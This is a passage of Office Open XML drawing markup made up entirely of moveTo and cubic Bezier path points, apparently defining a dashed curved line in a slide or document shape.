                    <a:pt x="493" y="178"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="460" y="200"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="465" y="196"/>
                    <a:pt x="471" y="193"/>
                    <a:pt x="476" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="478" y="188"/>
                    <a:pt x="479" y="185"/>
                    <a:pt x="478" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="476" y="181"/>
                    <a:pt x="474" y="181"/>
                    <a:pt x="472" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="466" y="186"/>
                    <a:pt x="461" y="190"/>
                    <a:pt x="455" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="454" y="195"/>
                    <a:pt x="453" y="197"/>
                    <a:pt x="454" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="456" y="201"/>
                    <a:pt x="458" y="201"/>
                    <a:pt x="460" y="200"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="428" y="224"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="433" y="220"/>
                    <a:pt x="438" y="216"/>
                    <a:pt x="444" y="212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="446" y="210"/>
                    <a:pt x="446" y="208"/>
                    <a:pt x="445" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="443" y="204"/>
                    <a:pt x="441" y="204"/>
                    <a:pt x="439" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="434" y="209"/>
                    <a:pt x="428" y="213"/>
                    <a:pt x="423" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="421" y="219"/>
                    <a:pt x="421" y="221"/>
                    <a:pt x="422" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="424" y="225"/>
                    <a:pt x="426" y="225"/>
                    <a:pt x="428" y="224"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="397" y="248"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="402" y="244"/>
                    <a:pt x="407" y="240"/>
                    <a:pt x="412" y="236"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="414" y="235"/>
                    <a:pt x="414" y="232"/>
                    <a:pt x="413" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="411" y="229"/>
                    <a:pt x="409" y="228"/>
                    <a:pt x="407" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="402" y="234"/>
                    <a:pt x="397" y="238"/>
                    <a:pt x="392" y="242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="390" y="244"/>
                    <a:pt x="390" y="246"/>
                    <a:pt x="391" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="392" y="250"/>
                    <a:pt x="395" y="250"/>
                    <a:pt x="397" y="248"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="366" y="274"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="371" y="270"/>
                    <a:pt x="376" y="266"/>
                    <a:pt x="381" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="383" y="260"/>
                    <a:pt x="383" y="257"/>
                    <a:pt x="382" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="380" y="254"/>
                    <a:pt x="378" y="254"/>
                    <a:pt x="376" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="371" y="259"/>
                    <a:pt x="366" y="264"/>
                    <a:pt x="361" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="359" y="270"/>
                    <a:pt x="359" y="272"/>
                    <a:pt x="361" y="274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="362" y="276"/>
                    <a:pt x="365" y="276"/>
                    <a:pt x="366" y="274"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="337" y="301"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="342" y="297"/>
                    <a:pt x="347" y="292"/>
                    <a:pt x="351" y="288"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="353" y="286"/>
                    <a:pt x="353" y="284"/>
                    <a:pt x="352" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="280"/>
                    <a:pt x="348" y="280"/>
                    <a:pt x="346" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="341" y="286"/>
                    <a:pt x="336" y="291"/>
                    <a:pt x="331" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="330" y="297"/>
                    <a:pt x="330" y="300"/>
                    <a:pt x="331" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="303"/>
                    <a:pt x="335" y="303"/>
                    <a:pt x="337" y="301"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="309" y="329"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="313" y="325"/>
                    <a:pt x="318" y="320"/>
                    <a:pt x="323" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="314"/>
                    <a:pt x="324" y="311"/>
                    <a:pt x="323" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="308"/>
                    <a:pt x="319" y="308"/>
                    <a:pt x="317" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="312" y="314"/>
                    <a:pt x="307" y="319"/>
                    <a:pt x="303" y="324"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301" y="325"/>
                    <a:pt x="301" y="328"/>
                    <a:pt x="303" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="304" y="331"/>
                    <a:pt x="307" y="331"/>
                    <a:pt x="309" y="329"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="281" y="358"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="286" y="354"/>
                    <a:pt x="290" y="349"/>
                    <a:pt x="295" y="344"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="296" y="342"/>
                    <a:pt x="296" y="340"/>
                    <a:pt x="295" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="337"/>
                    <a:pt x="290" y="337"/>
                    <a:pt x="289" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="343"/>
                    <a:pt x="280" y="348"/>
                    <a:pt x="275" y="353"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="274" y="355"/>
                    <a:pt x="274" y="357"/>
                    <a:pt x="276" y="359"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="277" y="360"/>
                    <a:pt x="280" y="360"/>
                    <a:pt x="281" y="358"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="255" y="389"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="384"/>
                    <a:pt x="264" y="378"/>
                    <a:pt x="268" y="373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="270" y="372"/>
                    <a:pt x="269" y="369"/>
                    <a:pt x="268" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="366"/>
                    <a:pt x="263" y="367"/>
                    <a:pt x="262" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="258" y="373"/>
                    <a:pt x="253" y="378"/>
                    <a:pt x="249" y="383"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="248" y="385"/>
                    <a:pt x="248" y="388"/>
                    <a:pt x="249" y="389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="391"/>
                    <a:pt x="254" y="390"/>
                    <a:pt x="255" y="389"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="230" y="420"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="414"/>
                    <a:pt x="238" y="409"/>
                    <a:pt x="242" y="404"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="244" y="402"/>
                    <a:pt x="244" y="400"/>
                    <a:pt x="242" y="398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="397"/>
                    <a:pt x="238" y="397"/>
                    <a:pt x="236" y="399"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="404"/>
                    <a:pt x="228" y="410"/>
                    <a:pt x="224" y="415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="222" y="417"/>
                    <a:pt x="223" y="419"/>
                    <a:pt x="224" y="420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="422"/>
                    <a:pt x="229" y="421"/>
                    <a:pt x="230" y="420"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="206" y="452"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="446"/>
                    <a:pt x="214" y="441"/>
                    <a:pt x="218" y="436"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="219" y="434"/>
                    <a:pt x="219" y="431"/>
                    <a:pt x="217" y="430"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="429"/>
                    <a:pt x="213" y="429"/>
                    <a:pt x="212" y="431"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="436"/>
                    <a:pt x="204" y="442"/>
                    <a:pt x="200" y="447"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="449"/>
                    <a:pt x="199" y="451"/>
                    <a:pt x="201" y="453"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="454"/>
                    <a:pt x="205" y="454"/>
                    <a:pt x="206" y="452"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="184" y="485"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="479"/>
                    <a:pt x="191" y="474"/>
                    <a:pt x="195" y="468"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="466"/>
                    <a:pt x="196" y="464"/>
                    <a:pt x="194" y="463"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="461"/>
                    <a:pt x="189" y="462"/>
                    <a:pt x="188" y="464"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="469"/>
                    <a:pt x="181" y="475"/>
                    <a:pt x="177" y="480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="482"/>
                    <a:pt x="176" y="485"/>
                    <a:pt x="178" y="486"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="487"/>
                    <a:pt x="182" y="487"/>
                    <a:pt x="184" y="485"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="162" y="518"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="513"/>
                    <a:pt x="169" y="507"/>
                    <a:pt x="173" y="501"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="500"/>
                    <a:pt x="173" y="497"/>
                    <a:pt x="171" y="496"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="495"/>
                    <a:pt x="167" y="495"/>
                    <a:pt x="166" y="497"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="503"/>
                    <a:pt x="159" y="509"/>
                    <a:pt x="155" y="514"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="516"/>
                    <a:pt x="155" y="519"/>
                    <a:pt x="157" y="520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="521"/>
                    <a:pt x="161" y="520"/>
                    <a:pt x="162" y="518"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="142" y="553"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="547"/>
                    <a:pt x="149" y="541"/>
                    <a:pt x="152" y="536"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="534"/>
                    <a:pt x="152" y="531"/>
                    <a:pt x="151" y="530"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="529"/>
                    <a:pt x="146" y="530"/>
                    <a:pt x="145" y="532"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="537"/>
                    <a:pt x="138" y="543"/>
                    <a:pt x="135" y="549"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="551"/>
                    <a:pt x="135" y="553"/>
                    <a:pt x="137" y="554"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="556"/>
                    <a:pt x="141" y="555"/>
                    <a:pt x="142" y="553"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="123" y="588"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="582"/>
                    <a:pt x="129" y="576"/>
                    <a:pt x="132" y="571"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="569"/>
                    <a:pt x="133" y="566"/>
                    <a:pt x="131" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="564"/>
                    <a:pt x="126" y="565"/>
                    <a:pt x="125" y="567"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="573"/>
                    <a:pt x="119" y="579"/>
                    <a:pt x="116" y="585"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="587"/>
                    <a:pt x="116" y="589"/>
                    <a:pt x="118" y="590"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="591"/>
                    <a:pt x="122" y="590"/>
                    <a:pt x="123" y="588"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="106" y="624"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="618"/>
                    <a:pt x="111" y="612"/>
                    <a:pt x="114" y="606"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="604"/>
                    <a:pt x="114" y="602"/>
                    <a:pt x="113" y="601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="600"/>
                    <a:pt x="108" y="601"/>
                    <a:pt x="107" y="603"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="609"/>
                    <a:pt x="101" y="615"/>
                    <a:pt x="99" y="621"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="623"/>
                    <a:pt x="98" y="625"/>
                    <a:pt x="100" y="626"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="627"/>
                    <a:pt x="105" y="626"/>
                    <a:pt x="106" y="624"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="624"/>
                    <a:pt x="106" y="624"/>
                    <a:pt x="106" y="624"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="90" y="661"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="655"/>
                    <a:pt x="95" y="649"/>
                    <a:pt x="98" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="640"/>
                    <a:pt x="98" y="638"/>
                    <a:pt x="96" y="637"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="636"/>
                    <a:pt x="91" y="637"/>
                    <a:pt x="90" y="639"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="645"/>
                    <a:pt x="85" y="652"/>
                    <a:pt x="82" y="658"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="660"/>
                    <a:pt x="82" y="662"/>
                    <a:pt x="84" y="663"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="664"/>
                    <a:pt x="89" y="663"/>
                    <a:pt x="90" y="661"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="75" y="698"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="692"/>
                    <a:pt x="80" y="686"/>
                    <a:pt x="82" y="679"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="677"/>
                    <a:pt x="82" y="675"/>
                    <a:pt x="80" y="674"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="673"/>
                    <a:pt x="76" y="674"/>
                    <a:pt x="75" y="676"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="683"/>
                    <a:pt x="70" y="689"/>
                    <a:pt x="68" y="695"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="697"/>
                    <a:pt x="68" y="700"/>
                    <a:pt x="70" y="700"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="701"/>
                    <a:pt x="74" y="700"/>
                    <a:pt x="75" y="698"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="62" y="736"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="730"/>
                    <a:pt x="66" y="723"/>
                    <a:pt x="68" y="717"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="715"/>
                    <a:pt x="68" y="713"/>
                    <a:pt x="66" y="712"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="711"/>
                    <a:pt x="61" y="712"/>
                    <a:pt x="61" y="714"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="721"/>
                    <a:pt x="56" y="727"/>
                    <a:pt x="54" y="733"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="735"/>
                    <a:pt x="55" y="738"/>
                    <a:pt x="57" y="738"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="739"/>
                    <a:pt x="61" y="738"/>
                    <a:pt x="62" y="736"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="50" y="774"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="768"/>
                    <a:pt x="54" y="761"/>
                    <a:pt x="56" y="755"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="753"/>
                    <a:pt x="55" y="751"/>
                    <a:pt x="53" y="750"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="749"/>
                    <a:pt x="49" y="750"/>
                    <a:pt x="48" y="753"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="759"/>
                    <a:pt x="44" y="765"/>
                    <a:pt x="42" y="772"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="774"/>
                    <a:pt x="43" y="776"/>
                    <a:pt x="45" y="777"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="777"/>
                    <a:pt x="49" y="776"/>
                    <a:pt x="50" y="774"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="40" y="813"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="806"/>
                    <a:pt x="43" y="800"/>
                    <a:pt x="45" y="793"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="791"/>
                    <a:pt x="44" y="789"/>
                    <a:pt x="42" y="788"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="788"/>
                    <a:pt x="37" y="789"/>
                    <a:pt x="37" y="791"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="798"/>
                    <a:pt x="33" y="804"/>
                    <a:pt x="32" y="811"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="813"/>
                    <a:pt x="33" y="815"/>
                    <a:pt x="35" y="816"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="816"/>
                    <a:pt x="39" y="815"/>
                    <a:pt x="40" y="813"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="31" y="852"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="845"/>
                    <a:pt x="33" y="839"/>
                    <a:pt x="35" y="832"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="830"/>
                    <a:pt x="34" y="828"/>
                    <a:pt x="32" y="827"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="827"/>
                    <a:pt x="28" y="828"/>
                    <a:pt x="27" y="830"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="837"/>
                    <a:pt x="24" y="843"/>
                    <a:pt x="23" y="850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="852"/>
                    <a:pt x="24" y="854"/>
                    <a:pt x="26" y="855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="855"/>
                    <a:pt x="30" y="854"/>
                    <a:pt x="31" y="852"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="852"/>
                    <a:pt x="31" y="852"/>
                    <a:pt x="31" y="852"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="23" y="891"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="884"/>
                    <a:pt x="26" y="878"/>
                    <a:pt x="27" y="871"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="869"/>
                    <a:pt x="26" y="867"/>
                    <a:pt x="24" y="866"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="866"/>
                    <a:pt x="19" y="867"/>
                    <a:pt x="19" y="870"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="876"/>
                    <a:pt x="17" y="883"/>
                    <a:pt x="15" y="889"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="892"/>
                    <a:pt x="17" y="894"/>
                    <a:pt x="19" y="894"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="894"/>
                    <a:pt x="23" y="893"/>
                    <a:pt x="23" y="891"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="891"/>
                    <a:pt x="23" y="891"/>
                    <a:pt x="23" y="891"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="17" y="930"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="924"/>
                    <a:pt x="19" y="917"/>
                    <a:pt x="20" y="910"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="908"/>
                    <a:pt x="19" y="906"/>
                    <a:pt x="17" y="906"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="906"/>
                    <a:pt x="13" y="907"/>
                    <a:pt x="12" y="909"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="916"/>
                    <a:pt x="10" y="923"/>
                    <a:pt x="10" y="929"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="931"/>
                    <a:pt x="11" y="933"/>
                    <a:pt x="13" y="934"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="934"/>
                    <a:pt x="17" y="932"/>
                    <a:pt x="17" y="930"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="13" y="970"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="963"/>
                    <a:pt x="14" y="957"/>
                    <a:pt x="15" y="950"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="948"/>
                    <a:pt x="14" y="946"/>
                    <a:pt x="12" y="946"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="945"/>
                    <a:pt x="7" y="947"/>
                    <a:pt x="7" y="949"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="956"/>
                    <a:pt x="6" y="962"/>
                    <a:pt x="5" y="969"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="971"/>
                    <a:pt x="6" y="973"/>
                    <a:pt x="9" y="973"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="974"/>
                    <a:pt x="13" y="972"/>
                    <a:pt x="13" y="970"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="10" y="1010"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="1003"/>
                    <a:pt x="11" y="996"/>
                    <a:pt x="11" y="990"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="988"/>
                    <a:pt x="10" y="986"/>
                    <a:pt x="8" y="985"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="985"/>
                    <a:pt x="4" y="987"/>
                    <a:pt x="3" y="989"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="996"/>
                    <a:pt x="2" y="1003"/>
                    <a:pt x="2" y="1009"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="1011"/>
                    <a:pt x="4" y="1013"/>
                    <a:pt x="6" y="1013"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="1014"/>
                    <a:pt x="10" y="1012"/>
                    <a:pt x="10" y="1010"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="9" y="1050"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="1043"/>
                    <a:pt x="9" y="1036"/>
                    <a:pt x="9" y="1030"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="1027"/>
                    <a:pt x="8" y="1026"/>
                    <a:pt x="5" y="1025"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="1025"/>
                    <a:pt x="1" y="1027"/>
                    <a:pt x="1" y="1029"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1036"/>
                    <a:pt x="1" y="1043"/>
                    <a:pt x="1" y="1049"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1052"/>
                    <a:pt x="2" y="1053"/>
                    <a:pt x="5" y="1053"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="1054"/>
                    <a:pt x="9" y="1052"/>
                    <a:pt x="9" y="1050"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="9" y="1089"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="1083"/>
                    <a:pt x="8" y="1076"/>
                    <a:pt x="8" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="1067"/>
                    <a:pt x="7" y="1065"/>
                    <a:pt x="4" y="1065"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="1065"/>
                    <a:pt x="0" y="1067"/>
                    <a:pt x="0" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1076"/>
                    <a:pt x="1" y="1083"/>
                    <a:pt x="1" y="1090"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1092"/>
                    <a:pt x="3" y="1094"/>
                    <a:pt x="5" y="1094"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="1093"/>
                    <a:pt x="9" y="1092"/>
                    <a:pt x="9" y="1089"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="1089"/>
                    <a:pt x="9" y="1089"/>
                    <a:pt x="9" y="1089"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="10" y="1129"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="1123"/>
                    <a:pt x="10" y="1116"/>
                    <a:pt x="9" y="1109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="1107"/>
                    <a:pt x="7" y="1105"/>
                    <a:pt x="5" y="1105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
